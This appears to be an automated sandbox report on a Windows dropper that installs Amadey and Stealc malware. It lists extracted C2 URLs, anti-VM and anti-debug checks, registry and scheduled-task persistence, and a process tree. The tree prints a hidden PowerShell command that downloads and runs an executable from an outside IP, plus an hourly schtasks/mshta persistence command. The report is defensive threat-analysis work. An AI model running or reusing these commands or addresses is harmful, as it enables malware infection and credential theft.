Analysis
-
max time kernel
147s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2025 19:25
Static task
static1
Behavioral task
behavioral1
Sample
e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe
Resource
win10v2004-20241007-en
General
-
Target
e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe
-
Size
5.5MB
-
MD5
5b7e15c0a370c3b796039e30b221a793
-
SHA1
5b07f2a80bbe4c0eb9ca276c4620191c5be33d73
-
SHA256
e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa
-
SHA512
cbe95b09c35c1488a376e28040d81687cc1e79bbfda86e8e53972fb8049a69694e64959bda18a846ee8f1882f77d6932c01b4700f5512ce9e0f0f46378ef8473
-
SSDEEP
98304:hZxqLXALENI6s1D4YYgXpov7D35FO3lJXlNGEx3BsE1lpCbAeVIAgdt/s3sEe84d:LI7ALENI6wD4CpOD36lhlNTxXCHr0y8d
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
brat
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2A6507.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3h41d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1P36h0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 50 2236 powershell.exe -
pid Process 408 powershell.exe 4572 powershell.exe 3376 powershell.exe 2236 powershell.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1P36h0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2A6507.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3h41d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2A6507.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1P36h0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3h41d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 1P36h0.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 4C840n.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 10 IoCs
pid Process 4544 s6Y82.exe 1568 W9H31.exe 2212 1P36h0.exe 2436 skotes.exe 2836 2A6507.exe 1704 3h41d.exe 1608 skotes.exe 448 4C840n.exe 3564 skotes.exe 1768 skotes.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 1P36h0.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 2A6507.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 3h41d.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" W9H31.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" s6Y82.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 2212 1P36h0.exe 2436 skotes.exe 2836 2A6507.exe 1704 3h41d.exe 1608 skotes.exe 3564 skotes.exe 1768 skotes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 1P36h0.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1664 1704 WerFault.exe 89 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4C840n.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s6Y82.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language W9H31.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1P36h0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2A6507.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3h41d.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3h41d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3h41d.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3908 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4400 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid Process 2212 1P36h0.exe 2212 1P36h0.exe 2436 skotes.exe 2436 skotes.exe 2836 2A6507.exe 2836 2A6507.exe 1704 3h41d.exe 1704 3h41d.exe 1608 skotes.exe 1608 skotes.exe 1704 3h41d.exe 1704 3h41d.exe 408 powershell.exe 408 powershell.exe 4572 powershell.exe 4572 powershell.exe 3376 powershell.exe 3376 powershell.exe 2236 powershell.exe 2236 powershell.exe 3564 skotes.exe 3564 skotes.exe 1768 skotes.exe 1768 skotes.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 408 powershell.exe Token: SeDebugPrivilege 4572 powershell.exe Token: SeDebugPrivilege 3376 powershell.exe Token: SeDebugPrivilege 2236 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2212 1P36h0.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 692 wrote to memory of 4544 692 e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe 83 PID 692 wrote to memory of 4544 692 e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe 83 PID 692 wrote to memory of 4544 692 e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe 83 PID 4544 wrote to memory of 1568 4544 s6Y82.exe 84 PID 4544 wrote to memory of 1568 4544 s6Y82.exe 84 PID 4544 wrote to memory of 1568 4544 s6Y82.exe 84 PID 1568 wrote to memory of 2212 1568 W9H31.exe 85 PID 1568 wrote to memory of 2212 1568 W9H31.exe 85 PID 1568 wrote to memory of 2212 1568 W9H31.exe 85 PID 2212 wrote to memory of 2436 2212 1P36h0.exe 86 PID 2212 wrote to memory of 2436 2212 1P36h0.exe 86 PID 2212 wrote to memory of 2436 2212 1P36h0.exe 86 PID 1568 wrote to memory of 2836 1568 W9H31.exe 87 PID 1568 wrote to memory of 2836 1568 W9H31.exe 87 PID 1568 wrote to memory of 2836 1568 W9H31.exe 87 PID 4544 wrote to memory of 1704 4544 s6Y82.exe 89 PID 4544 wrote to memory of 1704 4544 s6Y82.exe 89 PID 4544 wrote to memory of 1704 4544 s6Y82.exe 89 PID 692 wrote to memory of 448 692 e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe 109 PID 692 wrote to memory of 448 692 e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe 109 PID 692 wrote to memory of 448 692 e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe 109 PID 448 wrote to memory of 3656 448 4C840n.exe 110 PID 448 wrote to memory of 3656 448 4C840n.exe 110 PID 3656 wrote to memory of 3908 3656 cmd.exe 114 PID 3656 wrote to memory of 3908 3656 cmd.exe 114 PID 3656 wrote to memory of 4624 3656 cmd.exe 115 PID 3656 wrote to memory of 4624 3656 cmd.exe 115 PID 4624 wrote to memory of 408 4624 cmd.exe 116 PID 4624 wrote to memory of 408 4624 cmd.exe 116 PID 3656 wrote to memory of 3388 3656 cmd.exe 117 PID 3656 wrote to memory of 3388 3656 cmd.exe 117 PID 3388 wrote to memory of 4572 3388 cmd.exe 118 PID 3388 wrote to memory of 4572 3388 cmd.exe 118 PID 3656 wrote to memory of 4144 3656 cmd.exe 119 PID 3656 wrote to memory of 4144 3656 cmd.exe 119 PID 4144 wrote to memory of 3376 4144 cmd.exe 120 PID 4144 wrote to memory of 3376 4144 cmd.exe 120 PID 3656 wrote to memory of 4400 3656 cmd.exe 121 PID 3656 wrote to memory of 4400 3656 cmd.exe 121 PID 3656 wrote to memory of 4380 3656 cmd.exe 122 PID 3656 wrote to memory of 4380 3656 cmd.exe 122 PID 4380 wrote to memory of 2236 4380 mshta.exe 123 PID 4380 wrote to memory of 2236 4380 mshta.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe"C:\Users\Admin\AppData\Local\Temp\e6c814d8dfa2024ba52deb318eb38bda584037c5d9c88b6a2fa83e22425da0fa.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s6Y82.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\s6Y82.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\W9H31.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\W9H31.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1P36h0.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1P36h0.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2436
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2A6507.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2A6507.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2836
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3h41d.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3h41d.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1704 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1704 -s 15604⤵
- Program crash
PID:1664
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4C840n.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4C840n.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3FE2.tmp\3FF3.tmp\3FF4.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4C840n.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\system32\timeout.exetimeout /t 24⤵
- Delays execution with timeout.exe
PID:3908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3376
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "hXu87maae2N" /tr "mshta \"C:\Temp\NYBhcPOs6.hta\"" /sc minute /mo 60 /ru "Admin" /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:4400
-
-
C:\Windows\system32\mshta.exemshta "C:\Temp\NYBhcPOs6.hta"4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1704 -ip 17041⤵PID:1136
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3564
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1768
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
796B
MD5a59eb779137c2c4364c86d9e4838abc2
SHA17bc963e54c2aed1313d5ee4ab6a0d4904e02a664
SHA2562e50bd0045293c0e6939300956d3cbdabcf16634fcb72412f78f65eb9acc76bc
SHA512d847d279e1b006c045674b27129a49aa7c6f6591504b34777e09e690032a7407fca3ac9612f080802023a15dddd92a61eebe5e1b7ecf0b2113e611933ce74c6c
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD558b97594c4d764d5d99a459fbee0fd33
SHA14d1f8f4f5bbf87a6ea3ae7b7be623542377365da
SHA2568001b17515105615ae767a048f98b1c1d211130f7c8c7e9bb585cf063b0c6db2
SHA512874c700052930cfc7bc99e3e0353bf3a3891e45854df7982f73a2fa4d8a60546d683fae0163104e047991955d7d6b8950447be83a93d99ae9d9931a1e13e3cf7
-
Filesize
1KB
MD51f0f8c49b22409ca78499f5df1ce9456
SHA15300f7ed636959c8c8366418e891dbe49a3edba9
SHA256429128efcec165baf50a81021e610933e1020f5298d865f7b30daf370fb22014
SHA512ca976a7ab0ef4782c3003433e8d99d34d8060cb3a8790e787b56db1e207902b9dd15ecb6e76fecbd00f5e83a8add34329b25f86b90c62055f0d0d1de5607d2af
-
Filesize
1KB
MD5e5bfec1063a497048fffb231a0621403
SHA197cf6a89f237f43b9c22e3e081f7d45924d435ba
SHA256325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f
SHA512e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e
-
Filesize
2KB
MD518283422f83c1ac93981ad87b116aaaa
SHA1397308fcc63eef6bdccada1b6bd8ae5d37e81482
SHA2561573a145edf52b446401eea1fdeafcd48b6ecaf3f4bbb4a594a73b921ee02873
SHA5120892532063016e7603f5dec85fbbe3a2aff5c4d0d17079c41ec23640c95c53e27d4bb7f886b4ea79a797db4e9b805cb411996fb0a9c32e5efb1948775388c42e
-
Filesize
89KB
MD5b1e91c13619a7463ceff03cc77e10d6a
SHA1993193f5666067ef0f4976df25425b39cfd12489
SHA2563489747777e6f460e1da27247aaf76a1263538c5a7a7a568966ee1ce3204c82e
SHA51234a6c5ac9c3b8ebd598d99e12723798fa7a8082abfab9de7479445fca2efccdb5954abe3baa083a006f194ec1dcdc271067ded1e7f8793e46a595bf10a0ff6c5
-
Filesize
5.4MB
MD5b5b0b8822cc74384e0be79b7faff19b5
SHA1278478c826a764b692fcf292cbaf01794ae7fe22
SHA256577cf4b9c2dae26b4d0335119874d6a7f446b6b7fc7c16ac4423c04e925be518
SHA5125d69bee5157da3304454ec30335298e7bcdedd8cb69501971797e1dbf28a43479218d308cfc27784679043c30c84db173165998c48e33289fa6fead1154bc388
-
Filesize
1.7MB
MD5e0f6268cf0818db910969f6288089f34
SHA149bb66a98d4ec8e1f21c00d141a4d4818ffeb15c
SHA256020aa125186dc3997ed9fe6c16a1779662444e2eb74bf85a93d346a4d8c3f1bd
SHA512d79472b428b45a7496ad41e9cdc049e9d1312f5d6b8b7b17eaa7f315068f6e717514d2b672c6b0e141445230edde7075fba31a12c4d4f9a5887885c7c822a3bb
-
Filesize
3.6MB
MD51a063cced092397470af65be60b6612a
SHA1748de529f085464b651ed020545a0161295500a5
SHA256916550ec2e7ea38580f1084dc76a7189ea18f6ffcd006fce68aea84e519db716
SHA512cc21f8b6d3af6a5bfbc2e47069cd9a1051812b2d2dc8b7d3f14915b135d5a977953b9d548a5e03dad55c36c141511c8588c17391926fcc8b69da209c1e828384
-
Filesize
1.9MB
MD50d4e3ab9474332bdeabee7e40336c96d
SHA165a723a329d889d3399e267a3bf7442beb9f9c64
SHA2562e620700c43444d13c22d7eca043adde1aeecf66072127947b1bca05c13d3eb9
SHA512e53305ef3e920e90396a1fed7b251e1e965cf8a81a16f14eea41a26e4673a0d9c7b9a88ee8218c0d7078303c715cb3ab83bedd4a7c93d2216c79acb6f3ea3348
-
Filesize
3.0MB
MD5995973bb8c58bb023ff1720e50498bcc
SHA1a2012e4f21cde9b81de55d0221e34413439df5c5
SHA256108893c72fc1e4031cb1b0d719f7e67f0141cf4f14896a2fc71391d06812d160
SHA5120c2533e83fdaa2cc54993a57bd130961d82b6dffad870d39af9b571f3d440372ad7b82760a0a811e4c935e50e7a50824ffa41ffd15d891d5282dabdaeb99100d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82